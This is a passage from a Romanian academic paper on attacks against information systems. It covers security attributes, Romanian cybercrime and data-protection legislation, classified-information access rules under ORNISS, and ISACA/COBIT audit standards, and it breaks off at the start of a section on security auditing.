Atacuri Asupra Datelor din Sistemele Informatice

Introducere

În această lucrare, pe parcursul a 3 capitole, voi face o trecere în revistă a atacurilor asupra sistemelor informatice și a modurilor de prevenire a acestora.

Voi începe, în capitolul 1, cu prezentarea noțiunii de securitate a informațiilor precum și a legislației în acest domeniu.

Voi continua cu prezentarea pe scurt a clasificării informației precum și un rezumat al aspectelor generale privind asigurarea securității datelor în sistemele informatice.

În capitolul 2 voi defini și prezenta câteva modele de atacuri informatice și tehnicile folosite pentru acestea precum si a modului de protejare a informației cuprinzînd atât modele cît și mecanisme de securitate.

Ca studiu de caz, capitolul 3 abordează auditul de securitate al unui blog online și face o comparație cu ceea ce ar trebui să existe într-o societate economică pe linia protecției informației din sistemele informatice.

Zilnic auzim cuvinte precum internet, site, online, blog, email, twitter sau facebook. Majoritatea avem cel puțin o adresă de email sau un cont pe o rețea de socializare. Interacționăm cu alți utilizatori ca și noi fără a cunoaște exact identitatea acestora.

Dacă avem o afacere dorim să ne facem reclamă pe internet pentru a ne prezenta produsele sau serviciile. Ne facem cunoscute ideile și părerile prin blog-uri sau rețele de socializare. Dar nu observăm un lucru, în orice loc dorim să postăm o părere, o idee sau o reclamă suntem nevoiți să ne facem un cont. La crearea contului se cer anumite date personale, de la email până la numărul de telefon, adresa sau contul personal din bancă. Majoritatea, fără să fim atenți le completăm fără a ne întreba cât de sigure sunt aceste date în acel loc și, mai ales, fără a ne pune întrebarea cât de mult semnifică aceste date pentru noi.

Datele noastre, fie de identitate, nume de utilizator și parolă, fie date cu un caracter mult mai sensibil cum ar fi CNP-ul sau contul bancar ajung în diverse baze de date din mediul online. Locuri care nu mai depind de noi pentru a fi păstrate sigure, locuri care atrag ca un magnet persoane interesate să obțină aceste date pentru diverse scopuri.

Ce este informația? Cuvântul informație [web11], conform Wikipedia, este polisemantic, putând avea mai multe semnificații determinate de domeniile și contextele în care este folosit. Niciuna din definițiile sau conceptele existente pentru informație nu sunt unanim acceptate, fapt care produce de multe ori confuzii și ambiguități. Contradicția dintre diferitele concepte ale informației existente astăzi este cauzată de faptul că majoritatea acestora sunt elaborate specific pentru un anumit domeniu.

Importanța informației și a sistemelor de comunicații și informatică pentru societate și economia globală se intensifică odată cu valoarea și cantitatea informației transmisă și stocată pe aceste sisteme. Pentru multe organizații, informația și tehnologiile care o fac posibilă reprezintă cele mai valoroase bunuri ale organizației.

Ca societate, accesul tot mai rapid a informație a devenit o necesitate. Pe măsură ce această solicitare crește, tot mai multă informație este stocată și transmisă electronic, ceea ce duce la schimbarea modului în care companiile abordează afacerile. Informația, produsele informației, precum și costurile și beneficiile rezultate din informație devin din ce în ce mai mult transnaționale. Informația este “putere”, ea are o valoare, iar capacitatea de a stoca și procesa anumite informații poate furniza un important avantaj asupra competitorilor. Informația vehiculată astăzi nu mai poate fi catalogată ca exclusiv militară, politică sau de alta natură; ea are întotdeauna și consecințe economice.

Capitolul 1. Securitatea Informației

1.1 Definirea securității informației

Securitatea informației se ocupă cu stocarea și modul de manipulare al informațiilor astfel încât persoanele neautorizate să nu poată avea acces la acestea. Hackerii, crackerii sau persoanele ce încearcă să fure aceste informații încearcă să “păcălească” sistemele care validează persoana prin diverse tehnici de exploatare a breșelor de securitate și, mai ales, a neatenției umane. În orice domeniu de activitate, securitatea informațiilor trebuie să fie o activitate continuă pentru a se putea face față noilor amenințări la adresa securității sistemelor informatice în general și a datelor stocate în acestea în particular.

Securitatea sistemelor informatice (sau a calculatoarelor) își propune să protejeze atât calculatorul, cât și elementele asociate – clădirile, imprimantele, modem-urile, cablurile, precum și suporturile de memorie, atât împotriva accesului neautorizate, cât și altor amenințări care pot să apară. Ea poate fi definită ca fiind ansamblul de măsuri necesare asigurării secretului informației împotriva accesului neautorizat. În principal se urmărește asigurarea securității informației stocate sau transmise. Din această cauză, securitatea calculatoarelor este deseori numită securitatea informației sau securitatea datelor.

Asigurarea securității datelor presupune[1][3] atribute de funcționalitate a informației și atribute pentru recuperarea prejudiciului.

Atributele de funcționalitate a informației sunt:

Disponibilitatea informației este acea proprietate a sistemului sau rețelei de a asigura utilizatorilor legali (autentificați) informația completă atunci când aceștia au nevoie;

Confidențialitatea este acea proprietate a sistemului sau a rețelei de a permite accesul la informații numai utilizatorilor cărora le este destinată și să ofere garanții suficiente pentru a interzice accesul celorlalți utilizatori;

Integritatea informației este acea proprietate a sistemului sau a rețelei de a asigura livrarea informației fără modificări accidentale sau neautorizate.

Atribute pentru recuperarea prejudiciului sunt:

Autenticitatea informației este acea proprietate a sistemului sau a rețelei de a permite asocierea informației cu sursa legală de producere a ei;

Nerepudierea informației este acea proprietate a sistemului sau a rețelei de a asocia informației dovada că informația a fost transmisă de o entitate identificată și a fost recepționată de o altă entitate identificată fără posibilitate de contestare.

1.2 Legislație

Petre Rău, în lucrarea „Infracționalitatea pe calculator”, face o expunere a principalelor reglementări internaționale și naționale legate de securitatea informațiilor [7]. Alte detalii cu privire la statutul delictelor pe calculator mai pot fi găsite la adresa site-ului web al EFF -Electronic Frontier Foudation, http://www.eff.org, care cuprinde și lista legilor în domeniul infracționalității cu calculatorul.

În Comunitatea Europeană, tratamentul acordat activităților de spargere a sistemelor informatice – „cracking” este oarecum diferit de cel din SUA. Într-un raport al Consiliului Europei au fost făcute următoarele propuneri: "în vederea convergenței tehnologiei informației și a telecomunicațiilor, legea referitoare la supravegherea tehnică în scopul

investigației delictelor, cum ar fi interceptarea telecomunicațiilor, trebuie revăzută și

amendată, acolo unde este necesar, pentru a asigura aplicabilitatea sa. Legea trebuie să permită autorităților de investigare să profite de toate măsurile tehnice necesare si să permită colectarea traficului pentru investigarea delictelor"[7].

Toate țările Uniunii Europene au devenit sensibile la problema delictelor cu calculatorul. Marea Britanie a adoptat în 1990 legea privind folosirea necorespunzătoare a calculatoarelor (Computer Misuse Act) [web2]. În referința [7] se citează un caz de condamnare a unui autor de viruși electronici și se subliniază faptul că poliția engleză a raportat un număr redus de cazuri din cauză că firmele prejudiciate nu prea doresc să-și facă publice pagubele datorate de compromiterea rețelelor proprii.

Există și un standard internațional, adoptat de mai multe țări, care cuprinde o parte explicativă și o parte cu prevederi și recomandări pentru asigurarea securității informației. Acesta a apărut în anul 1999 și se numește BS 7799 [web3]. Modul de implementare este descris la punctul 1.8.1 Sistemul de Management al Securității Informației.

România beneficiază la această oră de câteva legi, ordonanțe și hotărâri de guvern care reglementează aspectele privind infracționalitatea electronică, comerțul electronic și protecția drepturilor de autor, puse în aplicare prin intermediul ANCOM1 și MCSI2.

Aceste legi pot fi comasate în 9 domenii: comerțul electronic, dreptul de autor, semnătura electronică, plățile electronice, publicitatea online, viața privată, criminalitatea informatică, pornografia pe Internet și comunicațiile electronice. Ele sunt prezentate în continuare, în ordinea cronologică a apariției:

Legea 8/1996 privind dreptul de autor și drepturile conexe (versiunea în vigoare până la 30 iulie 2004 );

Legea nr.193/2000 privind clauzele abuzive din contractele încheiate intre comercianți și consumatori – Republicată în Monitorul Oficial nr. 305 din 18 Aprilie 2008 -modificată de legea 160/2010;

Ordonanța Guvernului nr. 130/2000 privind regimul juridic al contractelor la distanță – versiunea inițială;

Ordonanța privind protecția consumatorilor la încheierea și executarea contractelor la distanță 130/2000 – Republicată în Monitorul Oficial cu numărul 177 din data de 7 martie 2008;

Legea semnăturii electronice – 455 / 2001 – Publicată în Monitorul Oficial nr. 429/2001;

Norme tehnice și metodologice pentru aplicarea Legii nr. 455/2001 privind semnătura electronică – HG 1259/2001, modificate prin HG 2303/2004;

1 Asociația Națională pentru Administrare și Reglementare în Comunicații

2 Ministerul Comunicațiilor și Societății Informatice

Legea pentru protecția persoanelor cu privire la prelucrarea datelor cu caracter personal și libera circulație a acestor date – 677 / 2001;

Legea nr. 64 din 24/03/2004 pentru ratificarea Convenției Consiliului Europei privind criminalitatea informatică adoptată la Budapesta la 23 noiembrie 2001;

Legea comerțului electronic 365/2002 Republicată în Monitorul Oficial al României, Partea I, nr. 403 din 10 mai 2006;

Hotărârea Guvernului nr. 1308 din 11/20/2002 privind aprobarea Normelor metodologice pentru aplicarea Legii 365/2002 privind comerțul electronic;

Lege privind regimul juridic al activității electronice notariale – 589/2004 publicată în Monitorul Oficial numărul 1227/20 decembrie 2004;

Ordinul Avocatului Poporului nr. 52 din 18 aprilie 2002 privind aprobarea Cerințelor minime de securitate a prelucrărilor de date cu caracter personal;

Ordonanța Guvernului 34/2002 privind accesul la rețelele publice de comunicații electronice și la infrastructura asociată, precum și interconectarea acestora, aprobată cu modificări și completări, prin Legea nr.527/2002;

Ordonanța de urgență a Guvernului 79/2002 privind cadrul general de reglementare a comunicațiilor, aprobată cu modificări și completări, prin Legea nr.591/2002, cu modificările și completările ulterioare;

Ordonanța Guvernului 31/2002 privind serviciile poștale, aprobată, cu modificări și completări, prin Legea 642/2002, cu modificările ulterioare;

Legea 51/2003 pentru aprobarea Ordonanței Guvernului nr. 130/2000 privind regimul juridic al contractelor la distanță;

Dispoziții privind prevenirea și combaterea criminalității informatice (Titlul III din Legea 161 din 19/04/2003 privind unele măsuri pentru asigurarea transparenței în exercitarea demnităților publice, a funcțiilor publice și în mediul de afaceri, prevenirea și sancționarea corupției – publicate în Monitorul Oficial, Partea I nr. 279 din 21/04/2003 );

Legea nr. 196 din 13 mai 2003 privind prevenirea și combaterea pornografiei -varianta republicată în Monitorul Oficial cu numărul 87 din data de 4 februarie 2008;

Legea 304/2003 pentru serviciul universal și drepturile utilizatorilor cu privire la rețelele și serviciile de comunicații electronice;

Ordonanța nr. 85 din 19 august 2004 privind protecția consumatorilor la încheierea și executarea contractelor la distanță privind serviciile financiare – Republicată în Monitorul Oficial al României, Partea I, nr. 899 din 28 decembrie 2007 – modificată de OUG 65/2009;

Legea nr. 285 din 23 iunie 2004 pentru modificarea și completarea Legii nr. 8/1996 privind dreptul de autor și drepturile conexe;

Legea 533/2004 pentru modificarea și completarea Ordonanței Guvernului nr. 51/1997 privind operațiunile de leasing și societățile de leasing publicată în Monitorul Oficial nr. 1135 / 1 decembrie 2004 ( Legea leasingului pentru software );

Legea privind marca temporală nr. 451/2004 publicată în Monitorul Oficial, Partea I nr. 1021;

Legea privind prelucrarea datelor cu caracter personal și protecția vieții private în sectorul comunicațiilor electronice 506/2004;

Legea 496/2004 pentru modificarea legii privind prevenirea și combaterea pornografiei 196/2003 publicată în Monitorul Oficial. nr. 1070 / 18 noiembrie 2004;

Ordonanța de Urgență nr. 123 din 1 septembrie 2005 pentru modificarea și completarea Legii nr. 8/1996 privind dreptul de autor și drepturile conexe;

Metodologia pentru utilizarea operelor muzicale ca tonuri de apel pentru telefoanele mobile și drepturile patrimoniale cuvenite titularilor drepturilor de autor publicată în Monitorul Oficial nr. 58 / 18 Ianuarie 2005;

Legea privind înființarea, organizarea și funcționarea Autorității Naționale de Supraveghere a Prelucrării Datelor cu Caracter Personal -102/2005;

Legea 239/2005 privind modificarea și completarea unor acte normative din domeniul comunicațiilor;

Legea 121/2006 pentru modificarea și completarea Legii nr. 365/2002 privind comerțul electronic;

Lege nr. 329 din 14 iulie 2006 privind aprobarea Ordonanței de urgență a Guvernului nr. 123/2005 pentru modificarea și completarea Legii nr. 8/1996 privind dreptul de autor și drepturile conexe;

Ordonanța Guvernului nr. 25/2006 privind întărirea capacității administrative a Oficiului Român pentru Drepturile de Autor – Republicată în Monitorul Oficial nr. 657 din 18.09.2008 – cu modificările aduse prin OUG nr. 43/2010;

Legea 364/2006 pentru aprobarea Ordonanței Guvernului nr. 25/2006 privind întărirea capacității administrative a Oficiului Român pentru Drepturile deAutor;

Regulamentul BNR 6 din 11 Octombrie 2006 privind emiterea și utilizarea instrumentelor de plată electronică și relațiile dintre participanții la tranzacțiile cu aceste instrumente;

Ordonanța de Urgență nr. 99 din 6 decembrie 2006 privind instituțiile de credit și adecvarea capitalului – Titlu IV: Instituții emitente de monedă electronică 3;

HG 557/2006 privind stabilirea datei de la care se pun în circulație pașapoartele electronice, precum și a formei și conținutului acestora;

Lege privind arhivarea documentelor în formă electronică 135/2007 – publicată în Monitorul Oficial nr. 345 din 22 mai 2007;

Lege privind înregistrarea operațiunilor comerciale prin mijloace electronice 260/2007 – Publicată în Monitorul Oficial, Partea I nr. 506 din 27/07/2007 4;

Ordinul MCTI nr. 389 din 27 iunie 2007 privind procedura de avizare a instrumentelor de plată cu acces la distanță, de tipul aplicațiilor internet-banking, home-banking sau mobile-banking 5 – publicat în Monitorul Oficial cu numărul 485 din data de 19 iulie 2007;

Legea 158/2008 privind publicitatea înșelătoare și publicitatea comparativă;

Legea nr. 298/2008 privind reținerea datelor generate sau prelucrate de furnizorii de servicii de comunicații electronice destinate publicului sau de rețele publice de comunicații, precum și pentru modificarea Legii nr. 506/2004 privind prelucrarea datelor cu caracter personal și protecția vieții private în sectorul comunicațiilor electronice 6;

Ordinul Ministerul Comunicațiilor și Societății Informaționale nr. 492/2009 din 15/06/2009 privind normele tehnice și metodologice pentru aplicarea Legii nr. 451/2004 privind marca temporală;

Ordinul Ministrului Comunicațiilor și Societății Informaționale nr. 500/2009 privind Normele tehnice și metodologice pentru aplicarea Legii nr. 589/2004 privind regimul juridic al activității electronice notariale;

3 conform OUG nr. 26/2010, prevederile acestui Titlu s-au abrogat începând cu data de 30 aprilie 2011

4 abrogată prin OUG 190/2009

5 abrogă Ordinul MCTI 218/2004

6declarată neconstituțională prin Decizia 1258/2009 a Curții Constituționale

1.2.1 Clasificarea delictelor informatice

Voi prezenta, foarte succint, o enumerare a delictelor informatice, în intenția de a se putea observa mai ușor că tipurile de infracțiuni din acest domeniu se încadrează într-o arie largă de domenii. Acesta ar putea fi primul motiv pentru care ar trebui să ne îngrijorăm iar autoritățile ar trebui să ia în serios subiectul, acordându-i o atenție cuvenită.

Conform Legii nr. 161 din 19 aprilie 2003 privind unele măsuri pentru asigurarea transparenței în exercitarea demnităților publice, a funcțiilor publice și în mediul de afaceri, prevenirea și sancționarea corupției, Titlul III și Legii nr. 365 / 2002 – legea privind comerțul electronic, infracțiunile informatice pot fi: falsificarea de dovezi, voalarea înșelătoriilor prin computer și cifrarea spargerilor mafiote; teletransmisia de date pentru tăinuire; pornografia de toate genurile, inclusiv cea infantilă; comandă de organe pentru transplant; sabotarea prin viruși; distribuirea materialelor ilegale (pornografice, propagandist-teroriste) sau software nelicențiat; spionajul economic și militar; spargerea de jocuri; fapte ilegale de șantaj și constrângere; falsificări de monede, înscrisuri, acte; digitizarea fotografiilor false și falsificări pe baza aparatelor foto cu schițare digitală; comerțul ilegal cu arme; diverse forme de delicte economice; infracțiuni privind protecția mediului înconjurător; furtul de carduri; omorul săvârșit prin intermediul calculatorului (modificarea premeditată de diagnostice etc.); atacuri de tip terorist; manipularea sistemelor de pază și protecție; utilizarea frauduloasă a Internetului; frauda datorată falsei identități si a spionilor în rețea; furtul timpului de navigare pe Internet; blocarea rețelelor prin supraîncărcare; fraude datorate acțiunilor protestatare, elitiste sau de afirmare ale hackerilor.

În recomandarea Consiliului Europei R(89)9 sunt incluse în 2 liste (principală și secundară) infracțiunile realizate cu ajutorul calculatorului întâlnite până acum în practică și care au perturbat destul de grav anumite relații sociale. Lista principală se referă la frauda informatică, falsul informatic, prejudiciile aduse bazelor de date, datelor si programelor de calculator, sabotajul informatic, accesul neautorizat, interceptarea neautorizată și reproducerea neautorizată de programe protejate. Lista secundară cuprinde: alterarea datelor sau programelor de calculator, spionajul informatic, utilizarea neautorizată a unui calculator și utilizarea neautorizată a unui program de calculator[6].

1.3Atributele de securitate ale informației

În primele decenii ale informației electronice, când Agenția pentru Proiecte de Cercetare Înaintate de Apărare – a Ministerului Apărării, Department of Defense sau DoD din SUA (Defence Advanced Research Projects Agency, DARPA) a creat prima rețea de computere interconectate sub numele ARPAnet, Internetul era folosit doar de câteva instituții pentru trimiterea poștei electronice. În zilele noastre, informația electronică și mai ales schimbul de date în această formă este din ce în ce mai prezentă în viața a milioane de oameni. În decursul acestei dezvoltări, activități care trebuie să se bucure de securitate maximă (transmiterea de bani dintr-un cont în altul, semnare de contracte, transmitere de informații confidențiale, licitații) și care erau efectuate în mod tradițional, cu ajutorul telefonului, faxului, prezenței personale la locul / instituția respectivă, au început să se regăsească din ce în ce mai mult printre aplicațiile software moderne, care ne ușurează viața de toate zilele – atât privat cât și în afaceri.

Securitatea informațiilor este dirijată de 4 scopuri de bază: confidențialitatea, integritatea, disponibilitatea și nerepudierea datelor.

Confidențialitatea, uneori numită secretizare, își propune să interzică accesul neautorizat al persoanelor la informația care nu le este destinată. Confidențialitatea reprezintă scopul principal al securității calculatoarelor. Pentru asigurarea confidențialității trebuie identificate care sunt informațiile ce trebuie protejate și cine trebuie sau cine nu trebuie să primească acces la ele. Aceasta presupune să existe mecanisme de protecție a informațiilor care sunt stocate în calculatoare și care sunt transferate prin rețea între calculatoare. În Internet, confidențialitatea primește noi dimensiuni sub forma unor măsuri de control al confidențialității. Majoritatea țărilor dezvoltate au reglementat prin lege controlul confidențialității.

Integritatea, uneori numită acuratețe, își propune ca datele stocate în calculator sau transmise prin rețea să nu poată fi alterate sau să nu poată fi modificate decât de persoane autorizate. Prin alterarea datelor se înțelege atât modificarea voit răuvoitoare cât și distrugerea accidentală a acestora. În acest caz se impune să existe un plan de recuperare și refacere a datelor (de exemplu existența unei copii de siguranță).

Disponibilitatea își propune ca datele stocate în calculatoare să poată să fie accesate de persoanele autorizate. Utilizatorii trebuie să aibă acces doar la datele care le sunt destinate. Se pot distinge aici două categorii de utilizatori, cu drepturi de acces strict diferite: administratorii de sistem și utilizatorii generali.

Nerepudierea, își propune să confirme destinatarului unui mesaj electronic faptul că acest mesaj este scris și trimis de persoana care pretinde că l-a trimis. În acest fel se asigură încrederea părților. Expeditorul nu poate să nege că nu a trimis el mesajul.

Nerepudierea stă la baza semnăturilor digitale, asigurând autenticitatea acestora, în noua piață a comerțului electronic (E-Commerce).

1.4 Clase de informații

Conform normelor Centrului de Expertiză în Domeniul Securității Informatice, înființat

sub autoritatea Ministerului Comunicațiilor și Securității Informației în cadrul Institutului

Național de Cercetare – Dezvoltare în Informatică (CERT-RO7) cele mai utilizate clase de informații sunt[web4]: informațiile clasificate (numite și informații secrete de stat) – care obligă la confidențialitate în condiții stabilite prin lege; informațiile proprietare (sau informații sensibile) – care obligă la confidențialitate în condițiile stabilite de proprietar (asimilate cu informațiile secret de serviciu); datele personale ale cetățenilor – care limitează diseminarea informațiilor despre utilizatorii serviciilor publice; conținutul corespondenței și al comunicațiilor – care interzice accesul la conținutul corespondenței și al comunicațiilor; drepturile de autor – care obligă la plată pentru utilizare; informațiile de interes public – acestea obligă proprietarul să asigure disponibilitatea necondiționat.

7 Centrul de Expertiză în Domeniul Securității Informatice este un compartiment nou înființat sub autoritatea Ministerului Comunicațiilor si Tehnologiei Informației în cadrul Institutului Național de Cercetare – Dezvoltare în Informatică – ICI București cu scopul de a crea un centru de excelență în domeniul securității informațiilor, echipamentelor, rețelelor și sistemelor informatice și de a focaliza interesul specialiștilor din mediul IT&C, dar și ai autorităților, asupra securității mediului virtual din România.

1.5Accesul la informațiile clasificate. ORNISS

În România, accesul la informațiile clasificate este reglementat de ORNISS. Oficiul Registrului Național al Informațiilor Secrete de Stat (ORNISS)[web10] a fost înființat prin Ordonanța de urgență a Guvernului nr. 153 din 7 noiembrie 2002, publicată în Monitorul Oficial al României nr. 826 din 15 noiembrie 2002, aprobată prin Legea nr. 101/24.03.2003, publicată în Monitorul Oficial al României, Partea I, nr. 207 din 31.03.2003. ORNISS exercită atribuții de reglementare, autorizare, evidență și control în conformitate cu prevederile Legii nr. 182/2002 privind protecția informațiilor clasificate, ale Standardelor naționale de protecție a informațiilor clasificate în România, aprobate prin Hotărârea Guvernului nr. 585/2002 și ale Normelor privind protecția informațiilor clasificate ale Organizației Tratatului Atlanticului de Nord în România, aprobate prin Hotărârea Guvernului nr. 353/2002.

1.5.1Accesul la informații secrete de stat

Conform ORNISS, în România, accesul la informații secrete de stat este permis, cu respectarea principiului necesității de a cunoaște, numai persoanelor care dețin certificat de securitate sau autorizație de acces, valabile pentru nivelul de secretizare al informațiilor necesare îndeplinirii atribuțiilor de serviciu. În practica protecției informațiilor clasificate se face distincție între informațiile naționale clasificate și informațiile NATO clasificate.

Pentru a asigura accesul personalului propriu la informații naționale clasificate, fiecare autoritate sau instituție publică emitentă sau deținătoare de astfel de informații va întocmi o

listă cuprinzând informațiile secrete de stat și o va aproba prin hotărâre a Guvernului, va întocmi o listă a funcțiilor care necesită acces la informații secrete de stat și va verifica și autoriza personalul desemnat să ocupe aceste funcții.

În vederea eliberării certificatelor de securitate/autorizațiilor de acces conducătorul unității solicită ORNISS în scris (conform HG nr. 585/2002, Anexa nr. 14) efectuarea verificărilor de securitate asupra persoanelor care urmează să aibă acces la informații secrete de stat. Solicitările privind efectuarea verificărilor de securitate în vederea avizării eliberării certificatelor de securitate/autorizațiilor de acces la informații secrete de stat se vor face în funcție de nivelul de secretizare al informațiilor la care persoanele urmează să obțină acces în virtutea sarcinilor de serviciu.

Solicitarea inițierii procedurilor de verificare în vederea eliberării certificatului de securitate/autorizației de acces la informații secrete de stat va fi însoțită de formularele tip (conform HG nr. 585/2002, anexele nr.15-17) potrivit nivelului de secretizare al informațiilor, completate de persoana în cauză, introduse în plic separat, sigilat.

Structura / funcționarul de securitate are obligația să pună la dispoziția persoanei selecționate formularele tip corespunzătoare nivelului de acces pentru care se solicită eliberarea certificatului de securitate/autorizației de acces și să acorde asistență în vederea completării acestora.

Dacă în cursul verificărilor, pentru orice nivel, apar informații ce evidențiază riscuri de securitate, se va realiza o verificare suplimentară, cu folosirea metodelor și mijloacelor specifice instituțiilor cu atribuții în domeniul siguranței naționale. În situația în care sunt semnalate elemente relevante din punct de vedere al protecției informațiilor secrete de stat, în luarea deciziei de acordare a avizului de securitate vor avea prioritate interesele de securitate.

Principalele criterii de evaluare a compatibilității în acordarea avizului pentru eliberarea certificatului de securitate / autorizației de acces vizează atât trăsăturile de caracter, cât și situațiile sau împrejurările din care pot rezulta riscuri și vulnerabilități de securitate.

1.5.2 Accesul la informații secrete de serviciu

Accesul personalului la informațiile secrete de serviciu este permis numai în baza autorizației scrise emise de conducătorul unității (conform HG nr. 781/2002,Anexa nr. 2).

Evidența autorizațiilor de acces la informații secrete de serviciu se ține centralizat de structura / funcționarul de securitate în Registrul pentru evidența autorizațiilor de acces la informații secrete de serviciu (conform HG nr. 781/2002,Anexa nr. 3).

În vederea eliberării autorizației de acces la informații secrete de serviciu, persoana care urmează să ocupe o funcție ce presupune accesul la astfel de informații prezintă structurii / funcționarului de securitate, în condițiile legii, recomandări și referințe asupra onestității și

profesionalismului, din partea persoanelor cu funcții de conducere cărora li se subordonează direct sau a reprezentanților autorizați ai altor persoane juridice,

după caz, și va semna un angajament de confidențialitate.

După ce verifică autenticitatea documentelor menționate mai sus, structura / funcționarul de securitate prezintă conducătorului unității propuneri privind oportunitatea eliberării autorizației de acces la informațiile secrete de serviciu.

Retragerea autorizației de acces la informații secrete de serviciu se face de către conducătorul unității deținătoare, în următoarele cazuri:

a) la încetarea raporturilor de muncă ori de serviciu, după caz, dintre unitate și deținătorul autorizației sau a calității de demnitate publică;

b) când atribuțiile specifice postului pe care este încadrat deținătorul autorizației nu mai presupun accesul la astfel de informații;

c) când deținătorul autorizației a încălcat reglementările privind protecția informațiilor secrete de serviciu.

După retragerea autorizației de acces la informații secrete de serviciu, structura / funcționarul de securitate procedează la distrugerea acesteia, pe bază de proces-verbal.

Accesul cetățenilor străini, al cetățenilor români care au și cetățenia altui stat, precum și al persoanelor apatride la informații secrete de serviciu este permis în condițiile stabilite prin Standardele naționale de protecție a informațiilor clasificate în România (conform HG nr. 585/2002), pe baza autorizației speciale de acces.

1.6 Aspecte generale privind asigurarea securității datelor

Datorită progresului tehnologic susținut, s-a trecut relativ rapid de la sistemul lent la un altul mult mai performant, multi-acces, cu partajarea resurselor sistemelor mari. Odată cu acest progres au apărut și alți factori de risc, cum sunt procesoarele multiple, echipamentele de memorare, terminalele aflate la distanță și utilizatorii multipli sau personalul sistemului.

Procesoarele[6, p. 273] sunt foarte vulnerabile prin prisma circuitelor pe baza cărora sunt construite, mulți specialiști în hardware reușind cu ușurință să le schimbe conținutul registrelor sau să acceseze instrucțiuni privilegiate. Software-ul inclus în procesorul central poate fi folosit chiar ca instrument de trecere peste protecția fișierelor și a sistemelor de limitare a accesului sau fraudei, mai mult, servind drept elemente de legitimare a utilizatorilor falși. Echipamentele de memorare sunt vulnerabile în fața tentativelor de copiere a informațiilor aflate pe noile suporturi, precum și la intențiile de măsluire a lor sau de folosire ca instrumente de provocare a defectării software-ului sau hardware-ului, spre exemplu prin arhicunoscuții viruși. Dispozitivele de comunicație servesc ca mijloc de fraudă pentru alți specialiști, care pot controla semnalele

transmise prin noile tehnologii, fie prin cablu, fie prin unde electromagnetice sau pe alte căi. Utilizatorii pot să-și substituie cu multă ușurință identitatea, efectuând fraude în numele altor persoane, care, pretind că acționează în legalitate. Terminalele aflate la distanță pot fi ușor influențate prin recurgerea la o aparatură specială. Personalul sistemului are dreptul să urmărească bunul mers al programelor, al prelucrării fișierelor, al asigurării protecției, situație în care, dacă nu sunt loiali sistemului, pot constitui pericolul cel mai mare.

Pentru a asigura un climat de securitate se folosesc diverse instrumente pentru a analiza starea de siguranță a sistemelor. Dintre aceste instrumente, cele mai utilizate sunt auditul de securitate și managementul de securitate al sistemelor informatice.

Auditurile de securitate sunt parte a unui proces continuu de definire și menținere a unor politici eficiente de securitate. Aceasta îi implică pe toți cei care utilizează resurse, din oricare calculator, în întreaga organizație. Având în vedere natura dinamică a configurațiilor calculatoarelor și ale stocării a informației, unii manageri se pot întreba daca există cu adevărat un mod de a verifica registrele de securitate. Auditurile de securitate furnizează un astfel de instrument, un mod echitabil și măsurabil pentru a examina cât de sigură este, într-adevăr, o locație.

ISACA8 este cea mai cunoscută autoritate internațională în domeniul auditului,

controlului și managementului securității unui sistem informatic. ISACA a fost fondată în anul 1969 și are astăzi 200 de filiale în peste 60 de țări, numărând peste 40.000 de membri. „Misiunea ISACA este de a sprijini obiectivele companiilor prin dezvoltarea și promovarea cercetării, standardelor, competențelor și practicilor pentru managementul efectiv, controlului și auditului sistemelor informaționale” [web1].

Auditul sistemelor informaționale reprezintă procesul prin care se colectează și evaluează dovezi cu scopul de a determina dacă protecția fizică a activelor sistemului și măsurile prin care se asigură integritatea datelor, contribuie la utilizarea eficace a resurselor și ajută în mod eficient la atingerea obiectivelor organizației. Câteva standarde recomandate de ISACA datorită criteriilor stabilite prin acestea sunt definitorii:

ISACA S2: „Auditul sistemului informațional trebuie să fie o funcție independentă de aria sau activitatea supusă reviziei astfel încât să permită îndeplinirea cu obiectivitate a angajamentului”;

ISACA S5: ”Auditorul trebuie să planifice auditul sistemului informațional astfel încât să atingă obiectivele stabilite și conformitatea cu legislația și standardele profesionale aplicabile”;

ISACA S6: „În timpul misiuni sale, auditorul trebuie să obțină probe suficiente, de încredere și relevante pentru obiectivele stabilite. Constatările și concluziile trebuie să fie susținute prin interpretarea și analizarea probelor obținute”.

Raportul de audit, conform standardelor ISACA, este un document confidențial și prezintă constatările în funcție de practicile la care se raportează. Raportul va fi proiectat în conformitate cu Ghidul de Audit ISACA nr. G20 pentru a oferi rezultate semnificative

managementului și pentru a servi scopului auditului.

8 Information Systems Audit and Control Association – ISACA

Programul CISA 9 este dedicat profesioniștilor din sistemul informațional cărora le oferă posibilitatea de a dobândi cunoștințele necesare pentru a oferi garanția identificării și controlului riscurilor. Începând din 1978 programul CISA a fost adoptat pe plan internațional drept standard pentru audit, control și securitate. Dobândirea certificării CISA asigură o foarte bună reputație pentru audit, control și securitate calificate.

Certified Information Security Manager™ (CISM™) – este o nouă certificare și se adresează profesioniștilor experimentați din domeniul securității informației. Certificarea CISM este orientată către companii și este dedicată managementului riscului informației și elementelor de proiectare și securizare la nivel conceptual. Ea se adresează profesioniștilor care trebuie să mențină o vedere de ansamblu asupra întregului sistem informațional, prin managerierea, proiectarea, supravegherea și evaluarea securității informației unei companii. Alături de BS 7799 (ISO 27001), standardul COBIT10 elaborat de ISACA este un alt standard internațional prin care se poate realiza dezvoltarea și creșterea securității sistemelor informatice. COBIT este un set de obiective de control în domeniul informaticii, acceptate pe plan internațional, care se pot aplica în general și care sunt recunoscute în domeniul controlului de securitate și reglementare informatică.

COBIT[9] se bazează pe analiza și armonizarea standardelor și bunelor practici IT existente și este în conformitate cu principiile de guvernare general acceptate. Este poziționat la cel mai înalt nivel, determinat de cerințele economice, acoperă întreaga gamă de activități IT și se concentrează pe ceea ce ar trebui să fie realizat, mai degrabă decât cum se asigură o guvernare, un management și un control eficiente. Prin urmare, acționează ca un integrator de practici de guvernare IT și face apel la conducerea executivă, conducerea operațională și managementul IT, guvernare, asigurare și profesioniști din domeniul securității, precum și cei din domeniul auditului si controlului. Este proiectat pentru a fi complementar cu, și utilizat împreună cu alte standarde și bune practici.

Implementarea bunelor practici ar trebui făcută în corespondență cu cadrele de referință pentru guvernarea corporativă si control, adaptate la caracteristicile organizației respective și integrate cu celelalte regulamente, practici și metode existente la nivelul ei.

Pentru a evita ca aceste recomandări să nu fie puse în practică, conducerea și angajații ar trebui să conștientizeze și să înțeleagă ce e de făcut, cum și de ce e important să fie făcut.

Standardele și bunele practici nu reprezintă o soluție atotcuprinzătoare, eficacitatea lor depinzând de modul în care au fost adoptate și puse în practică dar și menținute actuale.

9 Certified Information Systems Auditor® – CISA

10 Control Objectives for Information and Related Technology – COBIT

1.7Auditul de securitate

